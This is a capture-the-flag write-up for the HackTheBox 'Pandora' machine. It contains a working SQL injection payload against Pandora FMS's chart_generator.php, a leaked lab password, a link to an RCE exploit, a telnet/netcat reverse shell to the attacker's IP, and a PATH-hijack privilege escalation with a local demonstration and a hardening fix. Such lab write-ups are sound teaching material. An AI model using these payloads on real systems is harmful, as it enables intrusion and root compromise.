Pandora

Write Up for the easy box Pandora


This one was done mostly by my friend Phil: he got the foothold and the user flag, and I only did the privilege escalation (it was pretty easy). So I'll just list the steps to a foothold rather than my thought process.

Foothold

Add pandora.htb to /etc/hosts.

The Pandora FMS console on the box listens on port 80 of localhost only, so forward it over SSH as daniel:

ssh -L 8000:localhost:80 daniel@pandora.htb

daniel's password is HotelBabylon23 (thx phil).

On your own machine, browse to http://127.0.0.1:8000 and you should see the console's login page.

Next is a SQL injection in chart_generator.php: the script looks the session up by the unauthenticated session_id parameter and unserialises the data column of the row it gets back, so a UNION can hand it a forged session that says the user is admin. In a new tab, go to (note plain http, since the forward goes to port 80):

http://127.0.0.1:8000/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO

Refresh the 127.0.0.1:8000 tab, and you should be logged in as admin.

Next, use this Python script to get RCE with the admin session cookie:

https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated

This part was really glitchy, so don't mess up the first run of the script, or you may have to switch HTB servers.

In a new terminal tab, open a netcat listener with

nc -lvnp 4444

In the RCE terminal, paste in

mknod backpipe p; telnet $IP 4444 0<backpipe | /bin/bash 1>backpipe

and make sure to replace $IP with your own OpenVPN IP (the address your listener is reachable on).

Now upgrade the shell to a PTY with

python3 -c 'import pty; pty.spawn("/bin/bash")'

The shell is still pretty rough, so if you can get an SSH session going as matt (drop your public key into ~/.ssh/authorized_keys or grab an id_rsa), use that instead.

cd /home/matt
cat user.txt

Privilege Escalation

Now with a nice foothold, we need the root flag.

After running through all the priv esc techniques on my checklist, I listed the SUID/SGID executables with

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

(the parentheses and the semicolon have to be escaped so the shell passes them to find rather than interpreting them itself)

and found something called pandora_backup

Interesting...Thats probably our priv esc vector.

I ran pandora_backup and it said I lacked the privileges to back up.

I still wanted to know what it did, so I ran

ltrace pandora_backup

and it showed the binary calling system() with a tar command that refers to tar by bare name rather than an absolute path. Since a setuid binary that shells out like this resolves the command through the caller's PATH, this is definitely the priv esc vector.

PATH is ours to set, so I'll just trick the binary into running a fake tar that spawns a shell. The file has to be executable, or the PATH lookup will skip it:

echo "/bin/bash" > /home/matt/tar
chmod +x /home/matt/tar
export PATH=/home/matt:$PATH

You can sanity-check that the fake tar is the one that will be found with

which tar

It should print /home/matt/tar.

Finally, just run

pandora_backup

and huzzah! root!

cat /root/root.txt
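To see the whole mechanism without a setuid binary, here is a local reproduction of the PATH hijack above, with the hardened pattern next to it. This is an added example, not code from the box or the writeup: the working directory, the fake tar, and the two backup functions (backup_relative and backup_hardened) are all constructed for the demonstration.

```bash
#!/bin/bash
# Added example, not part of the original writeup: reproduce the PATH hijack
# used against pandora_backup locally. Everything below (WORK, the fake tar,
# backup_relative, backup_hardened) is constructed for the demonstration.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# "$WORK/attacker" stands in for /home/matt; "$WORK/data" is what gets backed up.
mkdir -p "$WORK/attacker" "$WORK/data"
echo "sample" > "$WORK/data/file.txt"

# Stand-in for 'echo /bin/bash > /home/matt/tar': a fake tar that just reports
# that it ran. Note the chmod +x; without it the PATH lookup skips the file.
cat > "$WORK/attacker/tar" <<'EOF'
#!/bin/sh
echo "HIJACKED uid=$(id -u) args=$*"
EOF
chmod +x "$WORK/attacker/tar"

# Vulnerable pattern: "tar" has no directory component, so it is resolved
# through whatever PATH the caller supplies, exactly like system("tar ...").
backup_relative() {
    tar -cf "$WORK/out-relative.tar" -C "$WORK/data" . 2>&1
}

# Hardened pattern: an empty environment and a fixed PATH the caller cannot
# influence, so the attacker's directory is never searched. (Calling tar by
# absolute path in the C source has the same effect.)
backup_hardened() {
    env -i PATH=/usr/local/bin:/usr/bin:/bin /bin/sh -c \
        'tar -cf "$1" -C "$2" . && echo OK' _ "$WORK/out-hardened.tar" "$WORK/data" 2>&1
}

# What 'which tar' reports once the attacker's directory is prepended to PATH.
resolved_tar() {
    ( export PATH="$WORK/attacker:$PATH"; hash -r; command -v tar )
}

# Vulnerable backup run with the attacker's PATH: the fake tar executes.
hijack_demo() {
    ( export PATH="$WORK/attacker:$PATH"; hash -r; backup_relative )
}

# Same attacker PATH, hardened backup: the real tar executes and prints OK.
hardened_demo() {
    ( export PATH="$WORK/attacker:$PATH"; hash -r; backup_hardened )
}

echo "which tar  -> $(resolved_tar)"
echo "vulnerable -> $(hijack_demo)"
echo "hardened   -> $(hardened_demo)"
```

On the real box the fake tar was /bin/bash and the caller was setuid root, which is why the hijacked call handed back a root shell; here the fake tar only reports its uid so the outcome can be checked. The hardened function shows the fix a developer would apply to pandora_backup: never let a privileged program inherit PATH from the user who runs it.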

Shoutouts to Phil 'filmore' Mor.